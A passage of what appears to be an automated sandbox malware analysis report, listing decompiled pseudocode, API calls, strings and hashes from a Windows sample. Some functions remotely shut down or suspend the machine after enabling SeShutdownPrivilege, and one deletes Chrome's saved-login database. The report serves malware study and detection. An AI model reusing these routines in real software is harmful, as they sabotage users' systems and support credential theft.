                    									goto L11;
                    								}
                    							} else {
                    								_push(0);
                    								_push(0);
                    								L11:
                    								 *_t64();
                    							}
                    						} else {
                    							_push(0);
                    							_t31 = E0043B4A1(_t28, E00401FAB(E00401E65( &_a16, "2", __ebp, __eflags, 1))) | 0x00000002;
                    							__eflags = _t31;
                    							goto L6;
                    						}
                    					} else {
                    						_t31 = E0043B4A1(_t33, E00401FAB(E00401E65( &_a12, "1", __ebp, __eflags, 1))) | 0x00000001;
                    						goto L6;
                    					}
                    				} else {
                    					_t31 = E0043B4A1(_t36, E00401FAB(E00401E65( &_a12, "0", __ebp, _t70, 1)));
                    					L6:
                    					ExitWindowsEx(_t31, ??);
                    				}
                    				_t7 =  &_a16; // 0x404421
                    				E00401E8D(_t7, _t62);
                    				E00401FD8();
                    				E00401FD8();
                    				return 0;
                    			}










                    0x004163ca
                    0x004163ca
                    0x004163d6
                    0x004163e2
                    0x004163eb
                    0x004163ec
                    0x004163ee
                    0x00416406
                    0x00416412
                    0x0041641b
                    0x0041641c
                    0x0041641e
                    0x00416439
                    0x0041644a
                    0x0041644c
                    0x00416493
                    0x00416495
                    0x0041649a
                    0x004164a1
                    0x004164a6
                    0x004164a7
                    0x004164a9
                    0x004164b3
                    0x004164b8
                    0x004164bf
                    0x004164c4
                    0x004164c6
                    0x004164cc
                    0x004164cd
                    0x004164ce
                    0x00000000
                    0x004164ce
                    0x004164ab
                    0x004164ab
                    0x004164ac
                    0x004164d0
                    0x004164d0
                    0x004164d0
                    0x0041644e
                    0x0041644e
                    0x00416467
                    0x00416467
                    0x00000000
                    0x00416467
                    0x00416420
                    0x00416434
                    0x00000000
                    0x00416434
                    0x004163f0
                    0x004163ff
                    0x0041646a
                    0x0041646c
                    0x0041646c
                    0x00416b20
                    0x00416b24
                    0x00416b30
                    0x00416b3c
                    0x00416b49

                    APIs
                      • Part of subcall function 004173E7: GetCurrentProcess.KERNEL32(00000028,?), ref: 004173F4
                      • Part of subcall function 004173E7: OpenProcessToken.ADVAPI32(00000000), ref: 004173FB
                      • Part of subcall function 004173E7: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0041740D
                      • Part of subcall function 004173E7: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0041742C
                      • Part of subcall function 004173E7: GetLastError.KERNEL32 ref: 00417432
                    • ExitWindowsEx.USER32 ref: 0041646C
                    • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00416481
                    • GetProcAddress.KERNEL32(00000000), ref: 00416488
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                    • String ID: !D@$PowrProf.dll$SetSuspendState
                    • API String ID: 1589313981-2876530381
                    • Opcode ID: 4795fc54a54687dce3a52d8e22541e97362f3b4fd4124a2b22f2fadf3ada7e4e
                    • Instruction ID: cf577f2918ec1dd5ef04c2ba0e7072798a155f9bad50a70d657d5893100165d2
                    • Opcode Fuzzy Hash: 4795fc54a54687dce3a52d8e22541e97362f3b4fd4124a2b22f2fadf3ada7e4e
                    • Instruction Fuzzy Hash: 8321417060430157CA14FBB28866AAF2359DF91789F40483FB542A71D2EF7CD845C79E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 94%
                    			E00451E4C(void* __ecx, signed int _a4, char _a8) {
                    				short _v8;
                    				short _t17;
                    				signed int _t18;
                    				signed int _t23;
                    				signed int _t25;
                    				signed int _t26;
                    				signed int _t27;
                    				void* _t30;
                    				void* _t31;
                    				intOrPtr _t32;
                    				intOrPtr _t33;
                    				intOrPtr* _t36;
                    				intOrPtr* _t37;
                    
                    				_push(__ecx);
                    				_t23 = _a4;
                    				if(_t23 == 0) {
                    					L21:
                    					_t11 =  &_a8; // 0x45216b
                    					if(GetLocaleInfoW( *( *_t11 + 8), 0x20001004,  &_v8, 2) != 0) {
                    						_t17 = _v8;
                    						if(_t17 == 0) {
                    							_t17 = GetACP();
                    						}
                    						L25:
                    						return _t17;
                    					}
                    					L22:
                    					_t17 = 0;
                    					goto L25;
                    				}
                    				_t18 = 0;
                    				if( *_t23 == 0) {
                    					goto L21;
                    				}
                    				_t36 = 0x45f338;
                    				_t25 = _t23;
                    				while(1) {
                    					_t30 =  *_t25;
                    					if(_t30 !=  *_t36) {
                    						break;
                    					}
                    					if(_t30 == 0) {
                    						L7:
                    						_t26 = _t18;
                    						L9:
                    						if(_t26 == 0) {
                    							goto L21;
                    						}
                    						_t37 = 0x45f340;
                    						_t27 = _t23;
                    						while(1) {
                    							_t31 =  *_t27;
                    							if(_t31 !=  *_t37) {
                    								break;
                    							}
                    							if(_t31 == 0) {
                    								L17:
                    								if(_t18 != 0) {
                    									_t17 = E0043B477(_t23, _t23);
                    									goto L25;
                    								}
                    								_t7 =  &_a8; // 0x45216b
                    								if(GetLocaleInfoW( *( *_t7 + 8), 0x2000000b,  &_v8, 2) == 0) {
                    									goto L22;
                    								}
                    								_t17 = _v8;
                    								goto L25;
                    							}
                    							_t32 =  *((intOrPtr*)(_t27 + 2));
                    							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
                    								break;
                    							}
                    							_t27 = _t27 + 4;
                    							_t37 = _t37 + 4;
                    							if(_t32 != 0) {
                    								continue;
                    							}
                    							goto L17;
                    						}
                    						asm("sbb eax, eax");
                    						_t18 = _t18 | 0x00000001;
                    						goto L17;
                    					}
                    					_t33 =  *((intOrPtr*)(_t25 + 2));
                    					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
                    						break;
                    					}
                    					_t25 = _t25 + 4;
                    					_t36 = _t36 + 4;
                    					if(_t33 != 0) {
                    						continue;
                    					}
                    					goto L7;
                    				}
                    				asm("sbb edx, edx");
                    				_t26 = _t25 | 0x00000001;
                    				goto L9;
                    			}
















                    0x00451e51
                    0x00451e52
                    0x00451e59
                    0x00451efd
                    0x00451f03
                    0x00451f16
                    0x00451f1c
                    0x00451f21
                    0x00451f23
                    0x00451f23
                    0x00451f29
                    0x00451f2e
                    0x00451f2e
                    0x00451f18
                    0x00451f18
                    0x00000000
                    0x00451f18
                    0x00451e5f
                    0x00451e64
                    0x00000000
                    0x00000000
                    0x00451e6a
                    0x00451e6f
                    0x00451e71
                    0x00451e71
                    0x00451e77
                    0x00000000
                    0x00000000
                    0x00451e7c
                    0x00451e93
                    0x00451e93
                    0x00451e9c
                    0x00451e9e
                    0x00000000
                    0x00000000
                    0x00451ea0
                    0x00451ea5
                    0x00451ea7
                    0x00451ea7
                    0x00451ead
                    0x00000000
                    0x00000000
                    0x00451eb2
                    0x00451ed0
                    0x00451ed2
                    0x00451ef5
                    0x00000000
                    0x00451efa
                    0x00451eda
                    0x00451eed
                    0x00000000
                    0x00000000
                    0x00451eef
                    0x00000000
                    0x00451eef
                    0x00451eb4
                    0x00451ebc
                    0x00000000
                    0x00000000
                    0x00451ebe
                    0x00451ec1
                    0x00451ec7
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00451ec9
                    0x00451ecb
                    0x00451ecd
                    0x00000000
                    0x00451ecd
                    0x00451e7e
                    0x00451e86
                    0x00000000
                    0x00000000
                    0x00451e88
                    0x00451e8b
                    0x00451e91
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00451e91
                    0x00451e97
                    0x00451e99
                    0x00000000

                    APIs
                    • GetLocaleInfoW.KERNEL32(00000000,2000000B,00000000,00000002,00000000,?,?,?,0045216B,?,00000000), ref: 00451EE5
                    • GetLocaleInfoW.KERNEL32(00000000,20001004,00000000,00000002,00000000,?,?,?,0045216B,?,00000000), ref: 00451F0E
                    • GetACP.KERNEL32(?,?,0045216B,?,00000000), ref: 00451F23
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: InfoLocale
                    • String ID: ACP$OCP$k!E
                    • API String ID: 2299586839-3838175351
                    • Opcode ID: ed48400a81b174c21d4e48f91f1a04e1491a4dcdf19badc37722df32e128186a
                    • Instruction ID: 40f1907846b7d2753fd533dd201d41bd6dc70a4b10bb7d115b6a415062845d57
                    • Opcode Fuzzy Hash: ed48400a81b174c21d4e48f91f1a04e1491a4dcdf19badc37722df32e128186a
                    • Instruction Fuzzy Hash: 1D21C132A00104A6D7308B54C902BAB77A6EB54B53F968466EC09DB232EB36DD49C398
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 82%
                    			E0040B887(void* __edx, void* __edi, void* __eflags) {
                    				char _v28;
                    				char _v52;
                    				void* __ebx;
                    				void* __ebp;
                    				long _t18;
                    				void* _t20;
                    				void* _t21;
                    				void* _t28;
                    				void* _t32;
                    				void* _t33;
                    				void* _t34;
                    
                    				_t37 = __eflags;
                    				_t32 = __edi;
                    				_t31 = E00402093(_t20,  &_v52, __edx, _t33, E0043BA9A(_t20, __eflags, "UserProfile"));
                    				E00406383(_t20,  &_v28, _t7, _t32, _t33, _t37, "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data");
                    				E00401FD8();
                    				if(DeleteFileA(E00401FAB( &_v28)) != 0) {
                    					_t28 = _t34 - 0x18;
                    					_push("\n[Chrome StoredLogins found, cleared!]");
                    					goto L6;
                    				} else {
                    					_t18 = GetLastError();
                    					if(_t18 == 0 || _t18 == 1) {
                    						_t28 = _t34 - 0x18;
                    						_push("\n[Chrome StoredLogins not found]");
                    						L6:
                    						E00402093(_t20, _t28, _t31, _t33);
                    						E0040C04D(_t20, _t31, _t33, __eflags);
                    						_t21 = 1;
                    					} else {
                    						_t21 = 0;
                    					}
                    				}
                    				E00401FD8();
                    				return _t21;
                    			}














                    0x0040b887
                    0x0040b887
                    0x0040b8a7
                    0x0040b8ac
                    0x0040b8b5
                    0x0040b8cb
                    0x0040b8f1
                    0x0040b8f3
                    0x00000000
                    0x0040b8cd
                    0x0040b8d4
                    0x0040b8d7
                    0x0040b8e5
                    0x0040b8e7
                    0x0040b8f8
                    0x0040b8f8
                    0x0040b8fd
                    0x0040b902
                    0x0040b8de
                    0x0040b8de
                    0x0040b8de
                    0x0040b8d7
                    0x0040b90a
                    0x0040b915

                    APIs
                    • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040B8C3
                    • GetLastError.KERNEL32 ref: 0040B8CD
                    Strings
                    • UserProfile, xrefs: 0040B893
                    • [Chrome StoredLogins found, cleared!], xrefs: 0040B8F3
                    • [Chrome StoredLogins not found], xrefs: 0040B8E7
                    • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040B88E
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: DeleteErrorFileLast
                    • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    • API String ID: 2018770650-1062637481
                    • Opcode ID: 5921760bd4782e4a4b8ac8696dd80376bacd02ae5309fd58007322b36d4a978a
                    • Instruction ID: 5cc4b16edabda9d65e02ff0cb74f21bb4f15b848ae44ad5b60940777cd429307
                    • Opcode Fuzzy Hash: 5921760bd4782e4a4b8ac8696dd80376bacd02ae5309fd58007322b36d4a978a
                    • Instruction Fuzzy Hash: 3F01F7716402059ACB04B7B6CC179BE7728DA11314F50013FF402721E2FE7D590986CE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E004173E7() {
                    				void* _v8;
                    				intOrPtr _v12;
                    				struct _TOKEN_PRIVILEGES _v24;
                    
                    				OpenProcessToken(GetCurrentProcess(), 0x28,  &_v8);
                    				LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                    				_v24.PrivilegeCount = 1;
                    				_v12 = 2;
                    				AdjustTokenPrivileges(_v8, 0,  &_v24, 0, 0, 0);
                    				return GetLastError() & 0xffffff00 | _t16 != 0x00000000;
                    			}






                    0x004173fb
                    0x0041740d
                    0x00417419
                    0x00417425
                    0x0041742c
                    0x00417441

                    APIs
                    • GetCurrentProcess.KERNEL32(00000028,?), ref: 004173F4
                    • OpenProcessToken.ADVAPI32(00000000), ref: 004173FB
                    • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0041740D
                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0041742C
                    • GetLastError.KERNEL32 ref: 00417432
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                    • String ID: SeShutdownPrivilege
                    • API String ID: 3534403312-3733053543
                    • Opcode ID: a71cbd6cb6e49f624ca5a829809355a329f8b34b3b2b30caf2e8be318b1c147c
                    • Instruction ID: 2d217391e297669c11527b65d84494397483b8a53eb9e62e534496c4fd95b848
                    • Opcode Fuzzy Hash: a71cbd6cb6e49f624ca5a829809355a329f8b34b3b2b30caf2e8be318b1c147c
                    • Instruction Fuzzy Hash: F2F03A71801228BBDB109BA0ED4DEEF7F7CEF05612F110068B805F1162DE748A04CBB5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 65%
                    			E00453B69(void* __ebx, void* __edi, void* __esi, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr* _a16, signed int _a20, intOrPtr _a24) {
                    				signed int _v8;
                    				char _v460;
                    				signed int _v464;
                    				void _v468;
                    				signed int _v472;
                    				signed int _v932;
                    				signed int _v936;
                    				signed int _v1392;
                    				signed int _v1396;
                    				signed int _v1400;
                    				char _v1860;
                    				signed int _v1864;
                    				signed int _v1865;
                    				signed int _v1872;
                    				signed int _v1876;
                    				signed int _v1880;
                    				signed int _v1884;
                    				signed int _v1888;
                    				signed int _v1892;
                    				signed int _v1896;
                    				intOrPtr _v1900;
                    				signed int _v1904;
                    				signed int _v1908;
                    				signed int _v1912;
                    				signed int _v1916;
                    				signed int _v1920;
                    				signed int _v1924;
                    				signed int _v1928;
                    				char _v1936;
                    				char _v1944;
                    				char _v2404;
                    				signed int _v2408;
                    				signed int _v2436;
                    				signed int _t724;
                    				signed int _t734;
                    				signed int _t735;
                    				signed int _t746;
                    				signed int _t751;
                    				signed int _t752;
                    				signed int _t758;
                    				signed int _t764;
                    				intOrPtr _t766;
                    				void* _t767;
                    				signed int _t768;
                    				signed int _t769;
                    				signed int _t770;
                    				signed int _t779;
                    				signed int _t784;
                    				signed int _t785;
                    				signed int _t786;
                    				signed int _t789;
                    				signed int _t790;
                    				signed int _t791;
                    				signed int _t793;
                    				signed int _t794;
                    				signed int _t795;
                    				signed int _t796;
                    				signed int _t801;
                    				signed int _t802;
                    				signed int _t808;
                    				signed int _t809;
                    				signed int _t812;
                    				signed int _t817;
                    				signed int _t825;
                    				signed int* _t828;
                    				signed int _t832;
                    				signed int _t843;
                    				signed int _t844;
                    				signed int _t846;
                    				char* _t847;
                    				signed int _t850;
                    				signed int _t854;
                    				signed int _t855;
                    				signed int _t860;
                    				signed int _t862;
                    				signed int _t867;
                    				signed int _t876;
                    				signed int _t879;
                    				signed int _t881;
                    				signed int _t884;
                    				signed int _t885;
                    				signed int _t886;
                    				signed int _t889;
                    				signed int _t902;
                    				signed int _t903;
                    				signed int _t905;
                    				char* _t906;
                    				signed int _t909;
                    				signed int _t913;
                    				signed int _t914;
                    				signed int* _t916;
                    				signed int _t919;
                    				signed int _t921;
                    				signed int _t926;
                    				signed int _t934;
                    				signed int _t937;
                    				signed int _t941;
                    				signed int* _t948;
                    				intOrPtr _t950;
                    				void* _t951;
                    				intOrPtr* _t953;
                    				signed int* _t957;
                    				unsigned int _t968;
                    				signed int _t969;
                    				void* _t972;
                    				signed int _t973;
                    				void* _t975;
                    				signed int _t976;
                    				signed int _t977;
                    				signed int _t978;
                    				signed int _t988;
                    				signed int _t993;
                    				signed int _t996;
                    				unsigned int _t999;
                    				signed int _t1000;
                    				void* _t1003;
                    				signed int _t1004;
                    				void* _t1006;
                    				signed int _t1007;
                    				signed int _t1008;
                    				signed int _t1009;
                    				signed int _t1014;
                    				signed int* _t1019;
                    				signed int _t1021;
                    				signed int _t1031;
                    				void _t1034;
                    				signed int _t1037;
                    				void* _t1040;
                    				signed int _t1047;
                    				signed int _t1054;
                    				signed int _t1055;
                    				signed int _t1058;
                    				signed int _t1059;
                    				signed int _t1061;
                    				signed int _t1062;
                    				signed int _t1063;
                    				signed int _t1067;
                    				signed int _t1071;
                    				signed int _t1072;
                    				signed int _t1073;
                    				signed int _t1075;
                    				signed int _t1076;
                    				signed int _t1077;
                    				signed int _t1078;
                    				signed int _t1079;
                    				signed int _t1080;
                    				signed int _t1082;
                    				signed int _t1083;
                    				signed int _t1084;
                    				signed int _t1085;
                    				signed int _t1086;
                    				signed int _t1087;
                    				unsigned int _t1088;
                    				void* _t1091;
                    				intOrPtr _t1093;
                    				signed int _t1094;
                    				signed int _t1095;
                    				signed int _t1096;
                    				signed int* _t1100;
                    				void* _t1104;
                    				void* _t1105;
                    				signed int _t1106;
                    				signed int _t1107;
                    				signed int _t1108;
                    				signed int _t1111;
                    				signed int _t1112;
                    				signed int _t1117;
                    				signed int _t1119;
                    				signed int _t1122;
                    				char _t1127;
                    				signed int _t1129;
                    				signed int _t1130;
                    				signed int _t1131;
                    				signed int _t1132;
                    				signed int _t1133;
                    				signed int _t1134;
                    				signed int _t1135;
                    				signed int _t1139;
                    				signed int _t1140;
                    				signed int _t1141;
                    				signed int _t1142;
                    				signed int _t1143;
                    				unsigned int _t1146;
                    				void* _t1150;
                    				void* _t1151;
                    				unsigned int _t1152;
                    				signed int _t1157;
                    				signed int _t1158;
                    				signed int _t1160;
                    				signed int _t1161;
                    				intOrPtr* _t1163;
                    				signed int _t1164;
                    				signed int _t1166;
                    				signed int _t1167;
                    				signed int _t1170;
                    				signed int _t1172;
                    				signed int _t1173;
                    				void* _t1174;
                    				signed int _t1175;
                    				signed int _t1176;
                    				signed int _t1177;
                    				void* _t1180;
                    				signed int _t1181;
                    				signed int _t1182;
                    				signed int _t1183;
                    				signed int _t1184;
                    				signed int _t1185;
                    				signed int* _t1188;
                    				signed int _t1189;
                    				signed int _t1190;
                    				signed int _t1191;
                    				signed int _t1192;
                    				intOrPtr* _t1194;
                    				intOrPtr* _t1195;
                    				signed int _t1197;
                    				signed int _t1199;
                    				signed int _t1202;
                    				signed int _t1208;
                    				signed int _t1212;
                    				signed int _t1217;
                    				signed int _t1220;
                    				signed int _t1221;
                    				signed int _t1222;
                    				signed int _t1223;
                    				signed int _t1224;
                    				signed int _t1225;
                    				signed int _t1227;
                    				signed int _t1228;
                    				signed int _t1229;
                    				signed int _t1230;
                    				signed int _t1232;
                    				signed int _t1233;
                    				signed int _t1234;
                    				signed int _t1235;
                    				signed int _t1236;
                    				signed int _t1238;
                    				signed int _t1239;
                    				signed int _t1241;
                    				signed int _t1243;
                    				signed int _t1245;
                    				signed int _t1247;
                    				signed int* _t1249;
                    				signed int* _t1251;
                    				signed int _t1260;
                    
                    				_t724 =  *0x47000c; // 0xc3a97826
                    				_v8 = _t724 ^ _t1247;
                    				_t1031 = _a20;
                    				_push(__esi);
                    				_push(__edi);
                    				_t1163 = _a16;
                    				_v1924 = _t1163;
                    				_v1920 = _t1031;
                    				E00453B3F( &_v1944, __eflags);
                    				_t1212 = _a8;
                    				_t729 = 0x2d;
                    				if((_t1212 & 0x80000000) == 0) {
                    					_t729 = 0x120;
                    				}
                    				 *_t1163 = _t729;
                    				 *((intOrPtr*)(_t1163 + 8)) = _t1031;
                    				_t1164 = _a4;
                    				if((_t1212 & 0x7ff00000) != 0) {
                    					L5:
                    					_t734 = E00449989( &_a4);
                    					_pop(_t1046);
                    					__eflags = _t734;
                    					if(_t734 != 0) {
                    						_t1046 = _v1924;
                    						 *((intOrPtr*)(_v1924 + 4)) = 1;
                    					}
                    					_t735 = _t734 - 1;
                    					__eflags = _t735;
                    					if(_t735 == 0) {
                    						_push("1#INF");
                    						goto L308;
                    					} else {
                    						_t751 = _t735 - 1;
                    						__eflags = _t751;
                    						if(_t751 == 0) {
                    							_push("1#QNAN");
                    							goto L308;
                    						} else {
                    							_t752 = _t751 - 1;
                    							__eflags = _t752;
                    							if(_t752 == 0) {
                    								_push("1#SNAN");
                    								goto L308;
                    							} else {
                    								__eflags = _t752 == 1;
                    								if(_t752 == 1) {
                    									_push("1#IND");
                    									goto L308;
                    								} else {
                    									_v1928 = _v1928 & 0x00000000;
                    									_a4 = _t1164;
                    									_a8 = _t1212 & 0x7fffffff;
                    									_t1260 = _a4;
                    									asm("fst qword [ebp-0x768]");
                    									_t1166 = _v1896;
                    									_v1916 = _a12 + 1;
                    									_t1054 = _t1166 >> 0x14;
                    									_t758 = _t1054 & 0x000007ff;
                    									__eflags = _t758;
                    									if(_t758 != 0) {
                    										_t1119 = 0;
                    										_t758 = 0;
                    										__eflags = 0;
                    									} else {
                    										_t1119 = 1;
                    									}
                    									_t1167 = _t1166 & 0x000fffff;
                    									_t1034 = _v1900 + _t758;
                    									asm("adc edi, esi");
                    									__eflags = _t1119;
                    									_t1055 = _t1054 & 0x000007ff;
                    									_t1217 = _t1055 - 0x434 + (0 | _t1119 != 0x00000000) + 1;
                    									_v1872 = _t1217;
                    									E00456300(_t1055, _t1260);
                    									_push(_t1055);
                    									_push(_t1055);
                    									 *_t1249 = _t1260;
                    									_t764 = E00457190(E00456410(_t1167, _t1217), _t1260);
                    									_v1904 = _t764;
                    									__eflags = _t764 - 0x7fffffff;
                    									if(_t764 == 0x7fffffff) {
                    										L16:
                    										__eflags = 0;
                    										_v1904 = 0;
                    									} else {
                    										__eflags = _t764 - 0x80000000;
                    										if(_t764 == 0x80000000) {
                    											goto L16;
                    										}
                    									}
                    									_v468 = _t1034;
                    									__eflags = _t1167;
                    									_v464 = _t1167;
                    									_t1037 = (0 | _t1167 != 0x00000000) + 1;
                    									_v472 = _t1037;
                    									__eflags = _t1217;
                    									if(_t1217 < 0) {
                    										__eflags = _t1217 - 0xfffffc02;
                    										if(_t1217 == 0xfffffc02) {
                    											L101:
                    											_t766 =  *((intOrPtr*)(_t1247 + _t1037 * 4 - 0x1d4));
                    											_t195 =  &_v1896;
                    											 *_t195 = _v1896 & 0x00000000;
                    											__eflags =  *_t195;
                    											asm("bsr eax, eax");
                    											if( *_t195 == 0) {
                    												_t1058 = 0;
                    												__eflags = 0;
                    											} else {
                    												_t1058 = _t766 + 1;
                    											}
                    											_t767 = 0x20;
                    											_t768 = _t767 - _t1058;
                    											__eflags = _t768 - 1;
                    											_t769 = _t768 & 0xffffff00 | _t768 - 0x00000001 > 0x00000000;
                    											__eflags = _t1037 - 0x73;
                    											_v1865 = _t769;
                    											_t1059 = _t1058 & 0xffffff00 | _t1037 - 0x00000073 > 0x00000000;
                    											__eflags = _t1037 - 0x73;
                    											if(_t1037 != 0x73) {
                    												L107:
                    												_t770 = 0;
                    												__eflags = 0;
                    											} else {
                    												__eflags = _t769;
                    												if(_t769 == 0) {
                    													goto L107;
                    												} else {
                    													_t770 = 1;
                    												}
                    											}
                    											__eflags = _t1059;
                    											if(_t1059 != 0) {
                    												L126:
                    												_v1400 = _v1400 & 0x00000000;
                    												_t224 =  &_v472;
                    												 *_t224 = _v472 & 0x00000000;
                    												__eflags =  *_t224;
                    												E0044608E( &_v468, 0x1cc,  &_v1396, 0);
                    												_t1249 =  &(_t1249[4]);
                    											} else {
                    												__eflags = _t770;
                    												if(_t770 != 0) {
                    													goto L126;
                    												} else {
                    													_t1086 = 0x72;
                    													__eflags = _t1037 - _t1086;
                    													if(_t1037 < _t1086) {
                    														_t1086 = _t1037;
                    													}
                    													__eflags = _t1086 - 0xffffffff;
                    													if(_t1086 != 0xffffffff) {
                    														_t1235 = _t1086;
                    														_t1194 =  &_v468 + _t1086 * 4;
                    														_v1880 = _t1194;
                    														while(1) {
                    															__eflags = _t1235 - _t1037;
                    															if(_t1235 >= _t1037) {
                    																_t208 =  &_v1876;
                    																 *_t208 = _v1876 & 0x00000000;
                    																__eflags =  *_t208;
                    															} else {
                    																_v1876 =  *_t1194;
                    															}
                    															_t210 = _t1235 - 1; // 0x70
                    															__eflags = _t210 - _t1037;
                    															if(_t210 >= _t1037) {
                    																_t1146 = 0;
                    																__eflags = 0;
                    															} else {
                    																_t1146 =  *(_t1194 - 4);
                    															}
                    															_t1194 = _t1194 - 4;
                    															_t948 = _v1880;
                    															_t1235 = _t1235 - 1;
                    															 *_t948 = _t1146 >> 0x0000001f ^ _v1876 + _v1876;
                    															_v1880 = _t948 - 4;
                    															__eflags = _t1235 - 0xffffffff;
                    															if(_t1235 == 0xffffffff) {
                    																break;
                    															}
                    															_t1037 = _v472;
                    														}
                    														_t1217 = _v1872;
                    													}
                    													__eflags = _v1865;
                    													if(_v1865 == 0) {
                    														_v472 = _t1086;
                    													} else {
                    														_t218 = _t1086 + 1; // 0x73
                    														_v472 = _t218;
                    													}
                    												}
                    											}
                    											_t1170 = 1 - _t1217;
                    											E004368A0(_t1170,  &_v1396, 0, 1);
                    											__eflags = 1;
                    											 *(_t1247 + 0xbad63d) = 1 << (_t1170 & 0x0000001f);
                    											_t779 = 0xbadbae;
                    										} else {
                    											_v1396 = _v1396 & 0x00000000;
                    											_t1087 = 2;
                    											_v1392 = 0x100000;
                    											_v1400 = _t1087;
                    											__eflags = _t1037 - _t1087;
                    											if(_t1037 == _t1087) {
                    												_t1150 = 0;
                    												__eflags = 0;
                    												while(1) {
                    													_t950 =  *((intOrPtr*)(_t1247 + _t1150 - 0x570));
                    													__eflags = _t950 -  *((intOrPtr*)(_t1247 + _t1150 - 0x1d0));
                    													if(_t950 !=  *((intOrPtr*)(_t1247 + _t1150 - 0x1d0))) {
                    														goto L101;
                    													}
                    													_t1150 = _t1150 + 4;
                    													__eflags = _t1150 - 8;
                    													if(_t1150 != 8) {
                    														continue;
                    													} else {
                    														_t166 =  &_v1896;
                    														 *_t166 = _v1896 & 0x00000000;
                    														__eflags =  *_t166;
                    														asm("bsr eax, edi");
                    														if( *_t166 == 0) {
                    															_t1151 = 0;
                    															__eflags = 0;
                    														} else {
                    															_t1151 = _t950 + 1;
                    														}
                    														_t951 = 0x20;
                    														_t1236 = _t1087;
                    														__eflags = _t951 - _t1151 - _t1087;
                    														_t953 =  &_v460;
                    														_v1880 = _t953;
                    														_t1195 = _t953;
                    														_t171 =  &_v1865;
                    														 *_t171 = _t951 - _t1151 - _t1087 > 0;
                    														__eflags =  *_t171;
                    														while(1) {
                    															__eflags = _t1236 - _t1037;
                    															if(_t1236 >= _t1037) {
                    																_t173 =  &_v1876;
                    																 *_t173 = _v1876 & 0x00000000;
                    																__eflags =  *_t173;
                    															} else {
                    																_v1876 =  *_t1195;
                    															}
                    															_t175 = _t1236 - 1; // 0x0
                    															__eflags = _t175 - _t1037;
                    															if(_t175 >= _t1037) {
                    																_t1152 = 0;
                    																__eflags = 0;
                    															} else {
                    																_t1152 =  *(_t1195 - 4);
                    															}
                    															_t1195 = _t1195 - 4;
                    															_t957 = _v1880;
                    															_t1236 = _t1236 - 1;
                    															 *_t957 = _t1152 >> 0x0000001e ^ _v1876 << 0x00000002;
                    															_v1880 = _t957 - 4;
                    															__eflags = _t1236 - 0xffffffff;
                    															if(_t1236 == 0xffffffff) {
                    																break;
                    															}
                    															_t1037 = _v472;
                    														}
                    														__eflags = _v1865;
                    														_t1088 = _t1087 - _v1872;
                    														_v472 = (0 | _v1865 != 0x00000000) + _t1087;
                    														_t1197 = _t1088 >> 5;
                    														_v1884 = _t1088;
                    														_t1238 = _t1197 << 2;
                    														E004368A0(_t1197,  &_v1396, 0, _t1238);
                    														 *(_t1247 + _t1238 - 0x570) = 1 << (_v1884 & 0x0000001f);
                    														_t779 = _t1197 + 1;
                    													}
                    													goto L128;
                    												}
                    											}
                    											goto L101;
                    										}
                    										L128:
                    										_v1400 = _t779;
